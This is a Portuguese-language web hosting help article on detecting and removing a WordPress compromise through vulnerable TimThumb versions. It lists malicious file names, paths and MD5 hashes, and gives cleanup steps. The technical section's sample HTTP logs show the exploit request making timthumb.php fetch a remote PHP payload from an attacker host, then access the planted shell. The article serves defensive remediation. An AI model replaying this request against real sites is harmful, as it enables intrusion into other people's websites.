Comprometimento do WordPress: TimThumb

TimThumb é uma ferramenta utilizada pelos temas e suplementos do WordPress para redimensionar imagens. As versões antigas do TimThumb apresentam uma vulnerabilidade na segurança que permite que os atacantes consigam carregar ficheiros maliciosos ("nocivos") a partir de outro sítio da internet. O primeiro ficheiro nocivo permite que o atacante carregue mais ficheiros maliciosos na conta de alojamento.

Pode obter mais informações sobre os comprometimentos e sobre como lidar com eles em E se o meu sítio da internet tiver sido acedido de forma ilícita?.

Sinais de que o seu sítio está comprometido

Para além dos sinais mencionados em E se o meu sítio da internet tiver sido acedido de forma ilícita?, pode constatar que o seu sítio foi afetado por este comprometimento específico se a sua conta incluir os ficheiros com os seguintes padrões num diretório de suplementos:

  • external_[md5 hash].php — por exemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — por exemplo: 7eebe45bde5168488ac4010f0d65cea8.php

Pode encontrar exemplos de possíveis códigos de validação md5 na secção MD5TOTAL de ficheiros maliciosos conhecidos deste artigo.

Também poderá encontrar os seguintes ficheiros no diretório de raiz do sítio da internet (mais informações):

  • x.txt
  • logx.txt

Soluções

Tem de remover todos os ficheiros nocivos e comprometidos. Antes de eliminar qualquer item, recomendamos que faça uma cópia de segurança do seu sítio da internet (mais informações).

Localizar ficheiros nocivos

Os ficheiros nocivos que foram inicialmente carregados devido à vulnerabilidade do TimThumb encontram-se normalmente num dos seguintes diretórios, localizados no diretório /tema ou /suplemento que contém o ficheiro vulnerável do TimThumb.

  • /tmp
  • /cache
  • /images

Exemplos de localizações de ficheiros nocivos:

[webroot]/wp-content/themes/[tema com vulnerabilidade do TimThumb]/cache/images/

Exemplos de nomes de ficheiros nocivos nestas localizações:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Os ficheiros x.txt e logx.txt contêm informações sobre a criação de um ficheiro nocivo mediante a vulnerabilidade do TimThumb e sobre a localização do ficheiro nocivo na conta de alojamento. Estas informações são úteis para determinar quais os ficheiros que devem ser removidos e onde pode encontrá-los. No entanto, não é provável que seja apresentada uma lista completa dos ficheiros que devem ser removidos.

Um exemplo:

Dia: Qui, 11 abr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[tema com vulnerabilidade do TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Ficheiros para remover

Depois de ter feito uma cópia de segurança do seu sítio, remova os seguintes ficheiros:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — por exemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — por exemplo: 7eebe45bde5168488ac4010f0d65cea8.php
  • Outros ficheiros PHP maliciosos encontrados juntamente com os ficheiros com o código de validação md5 no nome.

Pode fazê-lo por FTP (mais informações) ou através do gestor de ficheiros no painel de controlo da sua conta de alojamento (mais informações).

Também deveria:

  • Atualizar todos os seus temas e suplementos para a versão mais recente.
  • Substituir qualquer instância de TimThumb.php pela versão mais recente que pode encontrar aqui.

Informações técnicas

Exemplo de registos HTTP

x.x.x.x - - [27/abr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema com vulnerabilidade do TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/abr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema com vulnerabilidade do TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/abr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/abr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema com vulnerabilidade do TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/abr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema com vulnerabilidade do TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5TOTAL dos ficheiros maliciosos conhecidos

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Outros ficheiros maliciosos

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Este Artigo Foi Útil?
Obrigado pelos seus comentários. Para falar com um representante do serviço de apoio ao cliente, utilize o número de telefone da assistência ou a opção de conversação acima.
Ficamos contentes por o termos ajudado! Podemos fazer mais alguma coisa por si?
Pedimos desculpas. Indique-nos o que era confuso ou o motivo pelo qual a solução não resolveu o seu problema.